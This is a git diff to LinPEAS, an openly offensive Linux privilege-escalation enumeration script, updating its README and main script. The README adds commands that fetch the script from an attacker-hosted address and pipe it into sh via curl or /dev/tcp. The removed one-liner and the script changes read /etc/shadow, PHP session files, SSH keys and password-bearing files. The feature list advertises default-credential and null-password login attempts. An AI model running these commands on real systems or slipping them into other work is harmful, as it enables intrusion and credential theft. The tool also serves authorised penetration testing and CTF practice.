diff --git a/README.md b/README.md index 6883f91..87bf13a 100644 --- a/README.md +++ b/README.md @@ -8,6 +8,23 @@ Also valid for **Unix systems** [![asciicast](https://asciinema.org/a/250532.png)](https://asciinema.org/a/250532) +**Quick Start** +```bash +#From github +curl https://raw.githubusercontent.com/carlospolop/linux-privilege-escalation-awsome-script/master/linpeas.sh | sh +``` + +```bash +#Local network +python -m SimpleHTTPServer 80 +curl 10.10.10.10/linpeas.sh | sh + +#Without curl +nc -lvnp 80 < linpeas.sh +cat < /dev/tcp/10.10.10.10/80 | sh +``` + + The goal of this script is to search for possible **Privilege Escalation vectors**. This script doesn't have any dependency. @@ -84,101 +101,4 @@ The default file where all the data is recorded is: */tmp/linPE* (you can change file="/tmp/linPE";RED='\033[0;31m';Y='\033[0;33m';B='\033[0;34m';NC='\033[0m';rm -rf $file;echo "File: $file";echo "[+]Gathering system information...";printf $B"[*] "$RED"BASIC SYSTEM INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Operative system\n"$NC >> $file;(cat /proc/version || uname -a ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"PATH\n"$NC >> $file;echo $PATH 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Date\n"$NC >> $file;date 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo version\n"$NC >> $file;sudo -V 2>/dev/null| grep "Sudo ver" >> $file;echo "" >> $file;printf $Y"[+] "$RED"selinux enabled?\n"$NC >> $file;sestatus 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Useful software?\n"$NC >> $file;which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Capabilities\n"$NC >> $file;getcap -r / 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Environment\n"$NC >> $file;(set || env) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Top and cleaned proccesses\n"$NC >> $file;ps aux 2>/dev/null | grep -v "\[" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Binary processes permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Services\n"$NC >> $file;(/usr/sbin/service --status-all || /sbin/chkconfig --list || /bin/rc-status) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Different processes executed during 1 min (HTB)\n"$NC >> $file;if [ "`ps -e --format cmd`" ]; then for i in {1..121}; do ps -e --format cmd >> $file.tmp1; sleep 0.5; done; sort $file.tmp1 | uniq | grep -v "\[" | sed '/^.\{500\}./d' >> $file; rm $file.tmp1; fi;echo "" >> $file;printf $Y"[+] "$RED"Proccesses binary permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Scheduled tasks\n"$NC >> $file;crontab -l 2>/dev/null >> $file;ls -al /etc/cron* 2>/dev/null >> $file;cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root /var/spool/anacron 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Any sd* disk in /dev?\n"$NC >> $file;ls /dev 2>/dev/null | grep -i "sd" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Storage information\n"$NC >> $file;df -h 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Unmounted file-system?\n"$NC >> $file;cat /etc/fstab 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Printer?\n"$NC >> $file;lpstat -a 2>/dev/null >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering network information...";printf $B"[*] "$RED"NETWORK INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Hostname, hosts and DNS\n"$NC >> $file;cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" >> $file;dnsdomainname 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Networks and neightbours\n"$NC >> $file;cat /etc/networks 2>/dev/null >> $file;(ifconfig || ip a) 2>/dev/null >> $file;iptables -L 2>/dev/null >> $file;ip n 2>/dev/null >> $file;route -n 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Ports\n"$NC >> $file;(netstat -punta || ss -t; ss -u) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Can I sniff with tcpdump?\n"$NC >> $file;timeout 1 tcpdump >> $file 2>&1;echo "" >> $file;echo "" >> $file;echo "[+]Gathering users information...";printf $B"[*] "$RED"USERS INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Me\n"$NC >> $file;(id || (whoami && groups)) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l without password\n"$NC >> $file;echo '' | sudo -S -l -k 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Do I have PGP keys?\n"$NC >> $file;gpg --list-keys 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Superusers\n"$NC >> $file;awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Login\n"$NC >> $file;w 2>/dev/null >> $file;last 2>/dev/null | tail >> $file;echo "" >> $file;printf $Y"[+] "$RED"Users with console\n"$NC >> $file;cat /etc/passwd 2>/dev/null | grep "sh$" >> $file;echo "" >> $file;printf $Y"[+] "$RED"All users\n"$NC >> $file;cat /etc/passwd 2>/dev/null | cut -d: -f1 >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering files information...";printf $B"[*] "$RED"INTERESTING FILES\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"SUID\n"$NC >> $file;find / -perm -4000 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"SGID\n"$NC >> $file;find / -perm -g=s -type f 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside \$HOME (limit 20)\n"$NC >> $file;ls -la $HOME 2>/dev/null | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"20 First files of /home\n"$NC >> $file;find /home -type f 2>/dev/null | column -t | grep -v -i "/"$USER | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside .ssh directory?\n"$NC >> $file;find /home /root -name .ssh 2>/dev/null -exec ls -laR {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"*sa_key* files\n"$NC >> $file;find / -type f -name "*sa_key*" -ls 2>/dev/null -exec ls -l {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"Mails?\n"$NC >> $file;ls -alh /var/mail/ /var/spool/mail/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"NFS exports?\n"$NC >> $file;cat /etc/exports 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Hashes inside /etc/passwd? Readable /etc/shadow or /etc/master.passwd?\n"$NC >> $file;grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null >> $file;cat /etc/shadow /etc/master.passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Readable /root?\n"$NC >> $file;ls -ahl /root/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Inside docker or lxc?\n"$NC >> $file;dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`;lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`;if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" >> $file; fi;if [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" >> $file; fi;echo "" >> $file;printf $Y"[+] "$RED"*_history, profile, bashrc, httpd.conf\n"$NC >> $file;find / -type f \( -name "*_history" -o -name "profile" -o -name "*bashrc" -o -name "httpd.conf" \) -exec ls -l {} \; 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"All hidden files (not in /sys/) (limit 100)\n"$NC >> $file;find / -type f -iname ".*" -ls 2>/dev/null | grep -v "/sys/" | head -n 100 >> $file;echo "" >> $file;printf $Y"[+] "$RED"What inside /tmp, /var/tmp, /var/backups\n"$NC >> $file;ls -a /tmp /var/tmp /var/backups 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Interesting writable Files\n"$NC >> $file;USER=`whoami`;HOME=/home/$USER;find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'| sort | uniq >> $file;for g in `groups`; do find / \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'; done >> $file;echo "" >> $file;printf $Y"[+] "$RED"Web files?(output limited)\n"$NC >> $file;ls -alhR /var/www/ 2>/dev/null | head >> $file;ls -alhR /srv/www/htdocs/ 2>/dev/null | head >> $file;ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head >> $file;ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head >> $file;echo "" >> $file;printf $Y"[+] "$RED"Backup files?\n"$NC >> $file;find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*back*" -o -name "*bck*" \) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find IPs inside logs\n"$NC >> $file;grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find 'password' or 'passw' string inside /home, /var/www, /var/log, /etc\n"$NC >> $file;grep -lRi "password\|passw" /home /var/www /var/log 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l (you need to puts the password and the result appear in console)\n"$NC >> $file;sudo -l; ``` - -## What does linpe look for -- **System Information** - - [x] SO & kernel version - - [x] Sudo version - - [x] PATH - - [x] Date - - [x] System stats - - [x] Environment vars - - [x] SElinux - - [x] Printers - - [x] Dmesg (signature verifications) - - [x] Container? - -- **Devices** - - [x] sd* in /dev - - [x] Unmounted filesystems - -- **Available Software** - - [x] Useful software - - [x] Installed compilers - -- **Processes & Cron & Services** - - [x] Cleaned processes - - [x] Binary processes permissions - - [x] Different processes executed during 1 min - - [x] Cron jobs - - [x] Services - -- **Network Information** - - [x] Hostname, hosts & dns - - [x] Content of /etc/inetd.conf - - [x] Networks and neighbours - - [x] Active ports - - [x] Sniff permissions (tcpdump) - -- **Users Information** - - [x] Info about current user - - [x] PGP keys - - [x] `sudo -l` without password - - [x] doas config file - - [x] Pkexec policy - - [x] Try to login using `su` as other users (using null pass and the username) - - [x] List of superusers - - [x] List of users with console - - [x] Login info - - [x] List of all users - -- **Software Information** - - [x] MySQl (Version, user being configured, loging as "root:root","root:toor","root:", user hashes extraction via DB and file, possible backup user configured) - - [x] PostgreSQL (Version, try login in "template0" and "template1" as: "postgres:", "psql:") - - [x] Apache (Version) - - [x] PHP cookies - - [x] Wordpress (Database credentials) - - [x] Tomcat (Credentials) - - [x] Mongo (Version) - - [x] Supervisor (Credentials) - - [x] Cesi (Credentials) - - [x] Rsyncd (Credentials) - - [x] Hostapd (Credentials) - - [x] Wifi (Credentials) - - [x] Anaconda-ks (Credentials) - - [x] VNC (Credentials) - - [x] LDAP database (Credentials) - - [x] Open VPN files (Credentials) - - [x] SSH (private keys, known_hosts, authorized_hosts, authorized_keys, main config parameters in sshd_config, certificates) - - [X] PAM-SSH (Unexpected "auth" values) - - [x] AWS (Files with AWS keys) - - [x] NFS (privilege escalation misconfiguration) - - [x] Kerberos (configuration & tickets in /tmp) - - [x] Kibana (credentials) - - [x] Logstash (Username and possible code execution) - - [x] Elasticseach (Config info and Version via port 9200) - - [x] Vault-ssh (Config values, secrets list and .vault-token files) - - -- **Generic Interesting Files** - - [x] SUID & SGID files - - [x] Capabilities - - [x] .sh scripts in PATH - - [x] Hashes (passwd, shadow & master.passwd) - - [x] Try to read root dir - - [x] Files owned by root inside /home - - [x] Reduced list of files inside my home and /home - - [x] Mails - - [x] Backup files - - [x] DB files - - [x] Web files - - [x] Files that can contain passwords (and search for passwords inside *_history files) - - [x] List of all hidden files - - [x] List ALL writable files for current user (global, user and groups) - - [x] Inside /tmp, /var/tmp and /var/backups - - [x] Password ins config PHP files - - [x] Get IPs, passwords and emails from logs - - [x] "pwd" and "passw" inside files (and get most probable lines) - - -By Polop(TM) +By Polop(TM) \ No newline at end of file diff --git a/checks/README.md b/checks/README.md new file mode 100644 index 0000000..7e7a16b --- /dev/null +++ b/checks/README.md @@ -0,0 +1,99 @@ +# LinPEAS - Linux Privilege Escalation Awsome Script (with colors!!) + +Also valid for **Unix systems** + +## What does linpeas look for +- **System Information** + - [x] SO & kernel version + - [x] Sudo version + - [x] PATH + - [x] Date + - [x] System stats + - [x] Environment vars + - [x] SElinux + - [x] Printers + - [x] Dmesg (signature verifications) + - [x] Container? + +- **Devices** + - [x] sd* in /dev + - [x] Unmounted filesystems + +- **Available Software** + - [x] Useful software + - [x] Installed compilers + +- **Processes & Cron & Services** + - [x] Cleaned processes + - [x] Binary processes permissions + - [x] Different processes executed during 1 min + - [x] Cron jobs + - [x] Services + +- **Network Information** + - [x] Hostname, hosts & dns + - [x] Content of /etc/inetd.conf + - [x] Networks and neighbours + - [x] Iptables rules + - [x] Active ports + - [x] Sniff permissions (tcpdump) + +- **Users Information** + - [x] Info about current user + - [x] PGP keys + - [x] `sudo -l` without password + - [x] doas config file + - [x] Pkexec policy + - [x] Try to login using `su` as other users (using null pass and the username) + - [x] List of superusers + - [x] List of users with console + - [x] Login info + - [x] List of all users + +- **Software Information** + - [x] MySQl (Version, user being configured, loging as "root:root","root:toor","root:", user hashes extraction via DB and file, possible backup user configured) + - [x] PostgreSQL (Version, try login in "template0" and "template1" as: "postgres:", "psql:") + - [x] Apache (Version) + - [x] PHP cookies + - [x] Wordpress (Database credentials) + - [x] Tomcat (Credentials) + - [x] Mongo (Version) + - [x] Supervisor (Credentials) + - [x] Cesi (Credentials) + - [x] Rsyncd (Credentials) + - [x] Hostapd (Credentials) + - [x] Wifi (Credentials) + - [x] Anaconda-ks (Credentials) + - [x] VNC (Credentials) + - [x] LDAP database (Credentials) + - [x] Open VPN files (Credentials) + - [x] SSH (private keys, known_hosts, authorized_hosts, authorized_keys, main config parameters in sshd_config, certificates) + - [X] PAM-SSH (Unexpected "auth" values) + - [x] AWS (Files with AWS keys) + - [x] NFS (privilege escalation misconfiguration) + - [x] Kerberos (configuration & tickets in /tmp) + - [x] Kibana (credentials) + - [x] Logstash (Username and possible code execution) + - [x] Elasticseach (Config info and Version via port 9200) + - [x] Vault-ssh (Config values, secrets list and .vault-token files) + + +- **Generic Interesting Files** + - [x] SUID & SGID files + - [x] Capabilities + - [x] .sh scripts in PATH + - [x] Hashes (passwd, shadow & master.passwd) + - [x] Try to read root dir + - [x] Files owned by root inside /home + - [x] Reduced list of files inside my home and /home + - [x] Mails + - [x] Backup files + - [x] DB files + - [x] Web files + - [x] Files that can contain passwords (and search for passwords inside *_history files) + - [x] List of all hidden files + - [x] List ALL writable files for current user (global, user and groups) + - [x] Inside /tmp, /var/tmp and /var/backups + - [x] Password ins config PHP files + - [x] Get IPs, passwords and emails from logs + - [x] "pwd" and "passw" inside files (and get most probable lines) \ No newline at end of file diff --git a/linpeas.sh b/linpeas.sh index b926111..6b54db4 100755 --- a/linpeas.sh +++ b/linpeas.sh @@ -1,6 +1,6 @@ #!/bin/sh -VERSION="v2.0.2" +VERSION="v2.0.3" ########################################### #---------------) Colors (----------------# @@ -298,14 +298,14 @@ echo "" printf $B"=============================( "$GREEN"Devices"$B" )=============================\n"$NC #-- 1D) sd in /dev -printf $Y"[+] "$GREEN"Any sd* disk in /dev? (limit 10)\n"$NC -ls /dev 2>/dev/null | grep -i "sd" | head -n 10 +printf $Y"[+] "$GREEN"Any sd* disk in /dev? (limit 20)\n"$NC +ls /dev 2>/dev/null | grep -i "sd" | sed "s,crypt,${C}[1;31m&${C}[0m," | head -n 20 echo "" #-- 2D) Unmounted printf $Y"[+] "$GREEN"Unmounted file-system?\n"$NC printf $B"[i] "$Y"Check if you can mount umounted devices\n"$NC -cat /etc/fstab 2>/dev/null | grep -v "^#" | sed "s,$mountG,${C}[1;32m&${C}[0m,g" | sed "s,$notmounted,${C}[1;31m&${C}[0m," | sed "s,$mounted,${C}[1;34m&${C}[0m," | sed "s,$Wfolders,${C}[1;31m&${C}[0m," | sed "s,$mountpermsB,${C}[1;31m&${C}[0m,g" | sed "s,$mountpermsG,${C}[1;32m&${C}[0m,g" +cat /etc/fstab 2>/dev/null | grep -v "^#" | sed "s,$mountG,${C}[1;32m&${C}[0m,g" | sed "s,$notmounted,${C}[1;31m&${C}[0m," | sed "s,$mounted,${C}[1;34m&${C}[0m," | sed "s,$Wfolders,${C}[1;31m&${C}[0m," | sed "s,$mountpermsB,${C}[1;31m&${C}[0m,g" | sed "s,$mountpermsG,${C}[1;32m&${C}[0m,g" echo "" echo "" @@ -348,7 +348,7 @@ echo "" if ! [ "$FAST" ] && ! [ "$VERYFAST" ]; then printf $Y"[+] "$GREEN"Different processes executed during 1 min (interesting is low number of repetitions)\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs\n"$NC - if [ "`ps -e --format cmd 2>/dev/null`" ]; then for i in $(seq 1 1200); do ps -e --format cmd >> $file.tmp1; sleep 0.05; done; sort $file.tmp1 | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm $file.tmp1; fi + if [ "`ps -e --format cmd 2>/dev/null`" ]; then for i in $(seq 1 1250); do ps -e --format cmd >> $file.tmp1; sleep 0.05; done; sort $file.tmp1 | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm $file.tmp1; fi echo "" fi @@ -388,18 +388,23 @@ echo "" printf $Y"[+] "$GREEN"Networks and neighbours\n"$NC cat /etc/networks 2>/dev/null (ifconfig || ip a) 2>/dev/null -iptables -L 2>/dev/null +cat /etc/iptables ip n 2>/dev/null route -n 2>/dev/null echo "" -#-- 4NI) Ports +#-- 4NI) Iptables +printf $Y"[+] "$GREEN"Iptables rules\n"$NC +(iptables -L ; cat /etc/iptables/* | grep -v "^#") 2>/dev/null || echo_no +echo "" + +#-- 5NI) Ports printf $Y"[+] "$GREEN"Active Ports\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports\n"$NC (netstat -punta || ss -t; ss -u) 2>/dev/null | sed "s,127.0.0.1,${C}[1;31m&${C}[0m," echo "" -#-- 5NI) tcpdump +#-- 6NI) tcpdump printf $Y"[+] "$GREEN"Can I sniff with tcpdump?\n"$NC tcpd=`timeout 1 tcpdump 2>/dev/null` if [ "$tcpd" ]; then @@ -609,8 +614,14 @@ fi echo "" #-- 9SI) PHP cookies files +phpsess1=`ls /var/lib/php/sessions 2>/dev/null` +phpsess2=`find /tmp /var/tmp -name "sess_*" 2>/dev/null` printf $Y"[+] "$GREEN"Looking for PHPCookies\n"$NC -ls /var/lib/php/sessions 2>/dev/null || echo_not_found +if [ "$phpsess1" ] || [ "$phpsess2"]; then + if [ "$phpsess1" ]; then ls /var/lib/php/sessions 2>/dev/null; fi + if [ "$phpsess2" ]; then find /tmp /var/tmp -name "sess_*" 2>/dev/null; fi +else echo_not_found +fi echo "" #-- 10SI) Wordpress user, password, databname and host @@ -910,14 +921,12 @@ printf $Y"[+] "$GREEN"Hashes inside passwd file? ........... "$NC if [ "`grep -v '^[^:]*:[x\*]' /etc/passwd 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]' /etc/passwd 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m," else echo_no fi -echo "" ##-- 6IF) Read shadow files printf $Y"[+] "$GREEN"Can I read shadow files? ........... "$NC if [ "`cat /etc/shadow /etc/master.passwd 2>/dev/null`" ]; then cat /etc/shadow /etc/master.passwd 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m," else echo_no fi -echo "" ##-- 7IF) Read root dir printf $Y"[+] "$GREEN"Can I read root folder? ........... "$NC @@ -926,7 +935,7 @@ echo "" ##-- 8IF) Root file in home dirs printf $Y"[+] "$GREEN"Looking for root files in home dirs (limit 20)"$NC -(find /home $HOME -user root 2>/dev/null | head -n 20 | sed "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m,") || echo_not_found +(find /home -user root 2>/dev/null | head -n 20 | sed "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m,") || echo_not_found echo "" ##-- 9IF) Files inside my home @@ -935,7 +944,7 @@ ls -la $HOME 2>/dev/null | head -n 23 echo "" ##-- 10IF) Files inside /home -printf $Y"[+] "$GREEN"Files inside /home (limit 20)\n"$NC +printf $Y"[+] "$GREEN"Files inside others home (limit 20)\n"$NC (find /home -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found echo ""